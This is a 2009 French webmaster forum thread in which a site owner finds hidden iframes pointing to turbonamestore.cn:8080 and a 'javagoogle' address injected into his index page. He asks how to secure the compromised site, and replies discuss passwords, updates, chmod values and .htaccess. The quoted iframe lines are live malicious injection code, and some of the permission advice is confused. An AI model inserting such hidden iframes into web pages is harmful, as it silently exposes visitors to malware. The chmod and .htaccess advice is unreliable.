mon site est hacké ?

Discussion dans 'Administration d'un site Web' créé par voyagesnet, 20 Juin 2009.

  1. voyagesnet
    voyagesnet WRInaute discret
    Inscrit:
    23 Juin 2008
    Messages:
    64
    J'aime reçus:
    0
    bonjour
    j'ai un souci
    vraiment je ne sais pas d'où il vient le problème
    chaque 2 jours
    je trouve quelques balises que sont effacés et je trouve un autre code qui s'ajoute automatiquement juste en avant de <body>

    voila le code
    parfois:
    <iframe src="http://turbonamestore.cn:8080/index.php" width=160 height=163 style="visibility: hidden"></iframe>
    et parfois:
    parfois:
    <iframe src="http://javagoogle/index.php" width=160 height=163 style="visibility: hidden"></iframe>
    je ne sais pas c'est quoi exactement ?sachant que la page index de site seulement que se change

    y'a t 'il de réponse SVp ?
    supposant que mon site est hacké quels sont les mesures à prendre pour le securiser complétement
    sachant que je fais aujourd'hui le changement de mot de passe de ftp

    est ce que ce problème peut être cause d'un mauvais script utiliser sachant qu'il a commencer dès mon installation d'un script de analytics (php-stats0-1.9.2
    merci
    cordialement
     
  2. darkjukka
    darkjukka WRInaute impliqué
    Inscrit:
    28 Avril 2007
    Messages:
    670
    J'aime reçus:
    0
    Je pense que cette petite liste ne sera pas superflue :
    • Ré-uploader tout ton site en étant sûr que les fichiers sont sains
    • Changer ton mot de passe FTP
    • Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple
    • Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues
    • Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir ;)
     
  3. voyagesnet
    voyagesnet WRInaute discret
    Inscrit:
    23 Juin 2008
    Messages:
    64
    J'aime reçus:
    0

    bonjour
    le chmod est par defaut chmod 777 sur le fichier
    alors qu'est ce que je dois changer comme droit sur les fichiers?
    et j'utilise aussi le fichier:
    error401.html
    error400.html
    error403.html
    error500.html
     
  4. darkjukka
    darkjukka WRInaute impliqué
    Inscrit:
    28 Avril 2007
    Messages:
    670
    J'aime reçus:
    0
    Oula 777 c'est le pire ! Tout le monde peut le modifier ;)
    Passe le CHMOD à 404 ca ne sera que plus sécurisé.

    Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^
     
  5. voyagesnet
    voyagesnet WRInaute discret
    Inscrit:
    23 Juin 2008
    Messages:
    64
    J'aime reçus:
    0
    mais si je passe le CHMOD en 404 alors comme ca je n'aurais pas l'autirisation ni de modifier ni d'executer les fichiers et les dossier
    c'est mieux de faire 704 n'est ce pas et est ce que je dois faire ca sur tous les fichiers et les dossiers c a d sur le dossier www?

    merci

    cordialement
     
  6. darkjukka
    darkjukka WRInaute impliqué
    Inscrit:
    28 Avril 2007
    Messages:
    670
    J'aime reçus:
    0
    Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
    Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau ;)
     
  7. voyagesnet
    voyagesnet WRInaute discret
    Inscrit:
    23 Juin 2008
    Messages:
    64
    J'aime reçus:
    0
    et pusique je travail en plein temp sur le site
    alors
    à chaque remonte de fichier je dois changer l'accés?

    bon pour le www je fais CHMOD 705
    et pour les autres fichiers et dossiers je fais 755

    que pensez vous comme ça?
    y'a t 'il d'inconvénient?

    merci
     
  8. darkjukka
    darkjukka WRInaute impliqué
    Inscrit:
    28 Avril 2007
    Messages:
    670
    J'aime reçus:
    0
    Ya pas d'inconvénients mais par contre j'ai pas compris la première partie de ton post, tu peux être plus clair ?
     
  9. j-mi
    j-mi WRInaute accro
    Inscrit:
    17 Mai 2005
    Messages:
    3 358
    J'aime reçus:
    0
    Attention aux Chmods certains hébergeurs sont uniquement en 666 et 777

    je trouve que c'est mieux de travailler en htacces
     
  10. voyagesnet
    voyagesnet WRInaute discret
    Inscrit:
    23 Juin 2008
    Messages:
    64
    J'aime reçus:
    0

    bonjour
    même avec le htaccess je va utiliser le CHMOD non?

    sinon
    je crois que je dois écrire dans chaque fichier :

    -> AllowOverride All pour donner l'accées à tous
    sinon comment faire pour definir l'accés au propriétaire de site , l'internaute et le groupe de travail

    est ce qu'il est utile d'utiliser le .htpassword

    merci
    bye